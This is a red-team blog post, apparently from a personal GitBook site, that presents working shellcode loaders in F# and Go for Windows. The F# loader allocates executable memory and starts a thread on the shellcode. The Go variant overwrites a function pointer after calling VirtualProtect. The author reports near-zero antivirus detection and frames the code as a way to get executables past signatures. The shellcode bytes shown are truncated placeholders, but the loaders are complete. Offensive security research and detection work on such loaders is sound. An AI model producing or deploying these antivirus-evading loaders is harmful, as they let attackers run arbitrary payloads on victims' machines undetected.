Vincent Yiu
  • Red Team
  • About Vincent Yiu
  • Red Team Tips
  • Videos
  • Red Team
    • Attack Infrastructure
      • CloudFlare for IP Address Filtering
      • Azure Apps for Command and Control
      • CobaltSplunk
    • Backdooring PE Files
      • Backdoor 101
      • Backdoor 102
      • Backdoor 103
    • Cloud Security
      • CloudFront Domain Hijacks under Attack
      • Vultr Domain Hijacking
      • CloudFlare for Command and Control
    • Command and Control
      • TryCloudFlare Infrastructure and Domain Fronting
      • Domain Fronting using StackPath CDN
      • HAMMERTHROW: Rotate my domain
      • Domain Fronting via. CloudFront Alternate Domains
      • Validated CloudFront SSL Domains
      • Domain Fronting: Who Am I?
      • Host Header Manipulation
      • Finding Target-relevant Domain Fronts
      • Alibaba CDN Domain Fronting
      • TOR Fronting — Utilising Hidden Services to Hide Attack Infrastructure
    • General Exploitation
      • Payload Generation with CACTUSTORCH
      • Exploiting CVE-2017–8759: SOAP WSDL Parser Code Injection
      • Exploiting CVE-2017–0199: HTA Handler Vulnerability
      • F# Shellcode Execution
      • Bypassing Gmail Attachment Virus Check
      • IPFuscation
    • Hardware and Gadgets
      • USBNinja
      • Aorus Gaming Box for Password Cracking
      • Proxmark Adventures 101
      • Poor man’s guide to Raspberry Pi initial installation
    • Post Exploitation
      • Introducing ANGRYPUPPY
      • RDPInception
      • VLAN Attacks
    • Reconaissance
      • Reconnaissance using LinkedInt
      • DomLink — Automating domain discovery
      • OffensiveSplunk vs. Grep
    • Misc
      • Under the wire: Trebek — Walkthrough
Powered by GitBook
On this page

Was this helpful?

  1. Red Team
  2. General Exploitation

F# Shellcode Execution

PreviousExploiting CVE-2017–0199: HTA Handler VulnerabilityNextBypassing Gmail Attachment Virus Check

Last updated 6 years ago

Was this helpful?

I decided to go ahead and try to execute shellcode from F# by generating an EXE. It currently gets 1/66 on VT, with CrowdStrike Falcon detecting it using heuristics potentially due to PInvoke.

Code repository:

F# Code:

open System.Runtime.InteropServices
open System.Threading

[<DllImport "kernel32" >]
extern nativeint VirtualAlloc(
  nativeint         lpStartAddress,
  uint32            dwSize, 
  uint32            flAllocationType, 
  uint32         flProtect)

[<DllImport "kernel32" >]
extern nativeint CreateThread(
  uint32         lpThreadAttributes,
  uint32            dwStackSize, 
  nativeint            lpStartAddress, 
  uint32&         param,
  uint32         dwCreationFlags,
  uint32&         lpThreadId)

[<DllImport "kernel32" >]
extern nativeint WaitForSingleObject(
  nativeint         hHandle,
  uint32         dwMilliseconds)

  
let mutable threadId : uint32 = (uint32)0
let mutable pInfo : uint32 = (uint32)0
let mutable shellcode : byte[] = [|0xfcuy;0xe8uy;0x89uy;|]

let address = VirtualAlloc((nativeint)0, (uint32)shellcode.Length, (uint32)0x1000, (uint32)0x40)

Marshal.Copy(shellcode, 0, address, shellcode.Length)
let hThread = CreateThread((uint32)0,(uint32)0, address, &pInfo, (uint32)0, &threadId)
WaitForSingleObject(hThread, (uint32)0xFFFFFFFF) |> ignore
//
// As the shellcode is 32 bit, this must also be compiled as a 32 bit go application
// via "set GOARCH=386"

package main

import (
	"syscall"
	"unsafe"
)

var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")

func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
	ret, _, _ := procVirtualProtect.Call(
		uintptr(lpAddress),
		uintptr(dwSize),
		uintptr(flNewProtect),
		uintptr(lpflOldProtect))
	return ret > 0
}

func main() {
	var shellcode string = "\x31\xc9\x64\x8b\x41"

	// Make a function ptr
	f := func() {}

	// Change permsissions on f function ptr
	var oldfperms uint32
	if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {
		panic("Call to VirtualProtect failed!")
	}

	// Override function ptr
	**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&shellcode))

	// Change permsissions on shellcode string data
	var oldshellcodeperms uint32
	if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&shellcode))), uintptr(len(shellcode)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {
		panic("Call to VirtualProtect failed!")
	}

	// Call the function ptr it
	f()
}

This blog post serves as a means for me to keep note of useful snippets, as well as to share with the community. I couldn't find any snippets readily available to do this whilst searching Google so I thought I'd share.

This is potentially a decent language to turn to if we need an EXE on disk after Golang gets signatured more in the near future. If you're interested in using Golang instead, had posted this snippet before on Twitter:

https://github.com/vysecurity/FSharp-Shellcode
@evilsocket
https://play.golang.org/p/AeOelp76n6